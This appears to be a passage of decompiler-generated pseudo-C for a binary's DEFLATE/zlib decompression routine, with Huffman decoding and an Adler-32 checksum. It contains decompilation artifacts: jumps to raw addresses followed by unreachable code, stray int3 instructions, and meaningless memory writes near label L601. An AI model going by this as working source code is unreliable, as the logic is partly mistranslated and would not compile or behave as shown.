    							case 2:
    								if(0 != 0) {
    									L23:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 2;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L22;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L30:
    										L32:
    										if(0 != 0) {
    											L21:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L32;
    											} else {
    												L22:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 0xc) = 0;
    													goto L30;
    												} else {
    													goto L23;
    												}
    											}
    										} else {
    											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
    												 *(_t2870 - 0x110) = 1;
    											} else {
    												 *(_t2870 - 0x110) = 0;
    											}
    											_t1692 =  *(_t2870 - 0x110);
    											 *(_t2870 - 0x10) = _t1692;
    											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
    											if(_t2086 == 0) {
    												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    												if(1 > 0x8000) {
    													L42:
    													 *(_t2870 - 0x10c) = 1;
    												} else {
    													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    													if( *(_t2870 - 0x88) + 1 < 1) {
    														goto L42;
    													} else {
    														 *(_t2870 - 0x10c) = 0;
    													}
    												}
    												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
    												 *(_t2870 - 0x10) = _t2086;
    											}
    											if( *(_t2870 - 0x10) == 0) {
    												goto L48;
    											} else {
    												goto L45;
    											}
    										}
    									}
    								}
    								goto L600;
    							case 3:
    								if(0 != 0) {
    									goto L51;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L50;
    									} else {
    										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L58;
    									}
    								}
    								goto L600;
    							case 4:
    								if(0 != 0) {
    									goto L67;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L66;
    									} else {
    										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L74;
    									}
    								}
    								goto L600;
    							case 5:
    								if(0 != 0) {
    									goto L86;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L85;
    									} else {
    										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L93;
    									}
    								}
    								goto L600;
    							case 6:
    								if(0 != 0) {
    									goto L101;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L100;
    									} else {
    										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L108;
    									}
    								}
    								goto L600;
    							case 7:
    								if(0 != 0) {
    									goto L141;
    								} else {
    									goto L140;
    								}
    								goto L600;
    							case 8:
    								if(0 == 0) {
    								}
    								goto L165;
    							case 9:
    								if(0 != 0) {
    									goto L193;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L192;
    									} else {
    										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L200;
    									}
    								}
    								goto L600;
    							case 0xa:
    								if(0 != 0) {
    									goto L215;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L214;
    									} else {
    										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L222;
    									}
    								}
    								goto L600;
    							case 0xb:
    								if(0 != 0) {
    									goto L293;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L292;
    									} else {
    										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L300;
    									}
    								}
    								goto L600;
    							case 0xc:
    								if(0 == 0) {
    								}
    								goto L318;
    							case 0xd:
    								if(0 != 0) {
    									goto L325;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L324;
    									} else {
    										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L332;
    									}
    								}
    								goto L600;
    							case 0xe:
    								if(0 == 0) {
    								}
    								goto L344;
    							case 0xf:
    								if(0 != 0) {
    									goto L367;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L366;
    									} else {
    										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L374;
    									}
    								}
    								goto L600;
    							case 0x10:
    								if(0 != 0) {
    									goto L390;
    								} else {
    									goto L389;
    								}
    								goto L600;
    							case 0x11:
    								if(0 != 0) {
    									goto L424;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L423;
    									} else {
    										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L431;
    									}
    								}
    								goto L600;
    							case 0x12:
    								if(0 != 0) {
    									goto L454;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L453;
    									} else {
    										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L461;
    									}
    								}
    								goto L600;
    							case 0x13:
    								if(0 != 0) {
    									goto L479;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L478;
    									} else {
    										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L486;
    									}
    								}
    								goto L600;
    							case 0x14:
    								if(0 != 0) {
    									goto L536;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L535;
    									} else {
    										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L543;
    									}
    								}
    								goto L600;
    							case 0x15:
    								if(0 == 0) {
    								}
    								goto L581;
    							case 0x16:
    								if(0 == 0) {
    								}
    								goto L244;
    							case 0x17:
    								if(0 == 0) {
    								}
    								L45:
    								 *(_t2870 - 0x1c) = 0xffffffff;
    								_t2465 =  *(_t2870 + 8);
    								 *_t2465 = 0x24;
    								goto L600;
    							case 0x18:
    								if(0 == 0) {
    								}
    								goto L495;
    							case 0x19:
    								if(0 != 0) {
    									goto L146;
    								} else {
    									goto L144;
    								}
    								goto L600;
    							case 0x1a:
    								if(0 == 0) {
    								}
    								goto L114;
    							case 0x1b:
    								if(0 == 0) {
    								}
    								goto L149;
    							case 0x1c:
    								if(0 != 0) {
    									goto L555;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L554;
    									} else {
    										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L562;
    									}
    								}
    								goto L600;
    							case 0x1d:
    								if(0 != 0) {
    									goto L570;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L569;
    									} else {
    										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L577;
    									}
    								}
    								goto L600;
    							case 0x1e:
    								if(0 != 0) {
    									goto L122;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L121;
    									} else {
    										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L129;
    									}
    								}
    								goto L600;
    							case 0x1f:
    								if(0 != 0) {
    									goto L135;
    								} else {
    									goto L134;
    								}
    								goto L600;
    							case 0x20:
    								if(0 != 0) {
    									L504:
    									 *(_t2870 - 0x1c) = 2;
    									_t1692 =  *(_t2870 + 8);
    									 *_t1692 = 0x35;
    								} else {
    									L503:
    									_t2465 =  *(_t2870 - 0x14);
    									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
    										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
    										L502:
    										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
    										_t2086 =  *(_t2870 - 0x10) - 1;
    										 *(_t2870 - 0x10) = _t2086;
    										if( *(_t2870 - 0x118) == 0) {
    											L350:
    											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    											if(_t1747 < 4) {
    												L352:
    												if( *(_t2870 - 8) >= 0xf) {
    													L381:
    													goto 0x330bac;
    													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    													 *(_t2870 - 0x3c) = _t2519;
    													if( *(_t2870 - 0x3c) < 0) {
    														 *(_t2870 - 0x50) = 0xa;
    														do {
    															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
    															_t2519 =  *(_t2870 - 0x50) + 1;
    															 *(_t2870 - 0x50) = _t2519;
    														} while ( *(_t2870 - 0x3c) < 0);
    													} else {
    														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
    														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
    													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
    													 *(_t2870 - 8) = _t1747;
    													_t2086 = 0;
    													if(0 != 0) {
    														goto L352;
    													} else {
    														if( *(_t2870 - 0x10) < 0x100) {
    															L389:
    															_t2465 =  *(_t2870 - 0x14);
    															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    																_t2086 =  *(_t2870 - 0x14) + 1;
    																 *(_t2870 - 0x14) = _t2086;
    																goto L417;
    															} else {
    																L390:
    																 *(_t2870 - 0x1c) = 2;
    																_t1692 =  *(_t2870 + 8);
    																 *_t1692 = 0x18;
    															}
    														} else {
    															goto L418;
    														}
    													}
    												} else {
    													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														goto L381;
    													} else {
    														L354:
    														goto 0x330b73;
    														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    														 *(_t2870 - 0x3c) = _t2534;
    														if( *(_t2870 - 0x3c) < 0) {
    															if( *(_t2870 - 8) <= 0xa) {
    																goto L365;
    															} else {
    																 *(_t2870 - 0x50) = 0xa;
    																while(1) {
    																	goto 0x330b86;
    																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
    																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
    																	_t2534 =  *(_t2870 - 0x50) + 1;
    																	 *(_t2870 - 0x50) = _t2534;
    																	if( *(_t2870 - 0x3c) >= 0) {
    																		break;
    																	}
    																	_t1747 =  *(_t2870 - 0x50) + 1;
    																	if( *(_t2870 - 8) >= _t1747) {
    																		continue;
    																	}
    																	break;
    																}
    																if( *(_t2870 - 0x3c) < 0) {
    																	goto L365;
    																} else {
    																	goto L378;
    																}
    															}
    														} else {
    															_t1747 =  *(_t2870 - 0x3c) >> 9;
    															 *(_t2870 - 0x50) = _t1747;
    															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
    																L365:
    																_t2086 =  *(_t2870 - 4);
    																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																	goto L376;
    																} else {
    																	L366:
    																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																	if(_t2465 == 0) {
    																		 *(_t2870 - 0xc4) = 0;
    																		L374:
    																		L376:
    																		if(0 != 0) {
    																			goto L365;
    																		} else {
    																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																			_t1747 =  *(_t2870 - 8) + 8;
    																			 *(_t2870 - 8) = _t1747;
    																			if( *(_t2870 - 8) < 0xf) {
    																				goto L354;
    																			} else {
    																				goto L378;
    																			}
    																		}
    																	} else {
    																		L367:
    																		 *(_t2870 - 0x1c) = 1;
    																		_t1692 =  *(_t2870 + 8);
    																		 *_t1692 = 0x17;
    																	}
    																}
    															} else {
    																L378:
    																goto L381;
    															}
    														}
    													}
    												}
    											} else {
    												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    												if(_t2086 >= 2) {
    													if( *(_t2870 - 8) < 0xf) {
    														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    														 *(_t2870 - 0xc) = _t1747;
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    													}
    													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
    													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
    													if( *(_t2870 - 0x38) < 0) {
    														 *(_t2870 - 0x54) = 0xa;
    														do {
    															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
    															 *(_t2870 - 0x38) = _t2164;
    															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    														} while ( *(_t2870 - 0x38) < 0);
    													} else {
    														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
    													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    													 *(_t2870 - 8) = _t1863;
    													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
    														if( *(_t2870 - 8) < 0xf) {
    															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    															 *(_t2870 - 0xc) = _t1863;
    															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														}
    														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
    														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
    														if( *(_t2870 - 0x38) < 0) {
    															 *(_t2870 - 0x54) = 0xa;
    															do {
    																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
    																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
    																 *(_t2870 - 0x38) = _t2171;
    																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    															} while ( *(_t2870 - 0x38) < 0);
    														} else {
    															_t1868 =  *(_t2870 - 0x38) >> 9;
    															 *(_t2870 - 0x54) = _t1868;
    														}
    														goto 0x330c1e;
    														asm("int3");
    														 *(_t2870 - 0xc) = _t1868 >> _t2171;
    														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
    														if(_t1872 == 0) {
    															_t2086 =  *(_t2870 - 0x14);
    															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
    															L417:
    															goto L350;
    														} else {
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    															goto L418;
    														}
    													} else {
    														L418:
    														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
    														if( *(_t2870 - 0x10) != 0x100) {
    															_t1769 =  *(0x1fac1c +  *(_t2870 - 0x10) * 4);
    															 *(_t2870 - 0x24) = _t1769;
    															_t2180 =  *(_t2870 - 0x10);
    															_t2566 =  *(0x1fb634 + _t2180 * 4);
    															 *(_t2870 - 0x10) = _t2566;
    															if( *(_t2870 - 0x24) == 0) {
    																L437:
    																if( *(_t2870 - 8) >= 0xf) {
    																	L468:
    																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																	 *(_t2870 - 0x44) = _t2182;
    																	if( *(_t2870 - 0x44) < 0) {
    																		 *(_t2870 - 0x4c) = 0xa;
    																		do {
    																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
    																			_t2182 =  *(_t2870 - 0x4c) + 1;
    																			 *(_t2870 - 0x4c) = _t2182;
    																		} while ( *(_t2870 - 0x44) < 0);
    																	} else {
    																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
    																	}
    																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
    																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
    																	 *(_t2870 - 0xc) = _t1769;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L437;
    																	} else {
    																		 *(_t2870 - 0x24) =  *(0x1fb0a0 +  *(_t2870 - 0x28) * 4);
    																		_t2592 =  *(_t2870 - 0x28);
    																		_t1789 =  *(0x1fb120 + _t2592 * 4);
    																		 *(_t2870 - 0x28) = _t1789;
    																		if( *(_t2870 - 0x24) == 0) {
    																			L493:
    																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
    																			_t2465 =  *(_t2870 - 0x28);
    																			if(_t2465 <=  *(_t2870 - 0x7c)) {
    																				L498:
    																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
    																				 *(_t2870 - 0x30) = _t2211;
    																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
    																					_t2211 =  *(_t2870 - 0x30);
    																					 *(_t2870 - 0xf4) = _t2211;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x14);
    																					 *(_t2870 - 0xf4) = _t1789;
    																				}
    																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
    																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
    																						L522:
    																						goto L523;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
    																						do {
    																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
    																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
    																							_t2211 =  *(_t2870 - 0x14) + 8;
    																							 *(_t2870 - 0x14) = _t2211;
    																							_t2612 =  *(_t2870 - 0x30) + 8;
    																							 *(_t2870 - 0x30) = _t2612;
    																							_t1789 =  *(_t2870 - 0x30);
    																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
    																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
    																						 *(_t2870 - 0x10) = _t2086;
    																						if( *(_t2870 - 0x10) >= 3) {
    																							do {
    																								goto L522;
    																								L523:
    																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
    																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
    																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
    																								_t2086 =  *(_t2870 - 0x14) + 3;
    																								 *(_t2870 - 0x14) = _t2086;
    																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
    																								_t1789 =  *(_t2870 - 0x10) - 3;
    																								 *(_t2870 - 0x10) = _t1789;
    																							} while ( *(_t2870 - 0x10) > 2);
    																							if( *(_t2870 - 0x10) > 0) {
    																								_t1798 =  *(_t2870 - 0x14);
    																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
    																								}
    																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																								 *(_t2870 - 0x14) = _t2086;
    																							}
    																						} else {
    																							if( *(_t2870 - 0x10) != 0) {
    																								_t2086 =  *(_t2870 - 0x14);
    																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
    																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
    																								}
    																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																							}
    																						}
    																						goto L350;
    																					}
    																					L601:
    																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
    																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
    																					_t2870 = _t2870;
    																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
    																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
    																					asm("cld");
    																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
    																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
    																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
    																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
    																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
    																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
    																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
    																						_t1700 =  *(_t2870 - 0x98);
    																						_t1701 = _t1700 / 0x15b0;
    																						_t2473 = _t1700 % 0x15b0;
    																						 *(_t2870 - 0xa0) = _t2473;
    																						while( *(_t2870 - 0x98) != 0) {
    																							 *(_t2870 - 0x84) = 0;
    																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t2473 =  *(_t2870 - 0x84) + 8;
    																								 *(_t2870 - 0x84) = _t2473;
    																								_t1701 =  *(_t2870 - 0x58) + 8;
    																								 *(_t2870 - 0x58) = _t1701;
    																							}
    																							while(1) {
    																								_t2097 =  *(_t2870 - 0x84);
    																								if(_t2097 >=  *(_t2870 - 0xa0)) {
    																									break;
    																								}
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t1701 =  *(_t2870 - 0x84) + 1;
    																								 *(_t2870 - 0x84) = _t1701;
    																							}
    																							goto 0x330d69;
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							 *(_t2870 - 0x20) = _t1701 % _t2097;
    																							_t1706 =  *(_t2870 - 0x2c);
    																							_t1701 = _t1706 / 0xfff1;
    																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
    																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
    																							 *(_t2870 - 0x98) = _t2473;
    																							 *(_t2870 - 0xa0) = 0x15b0;
    																						}
    																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
    																						_t2094 =  *(_t2870 + 8);
    																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
    																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
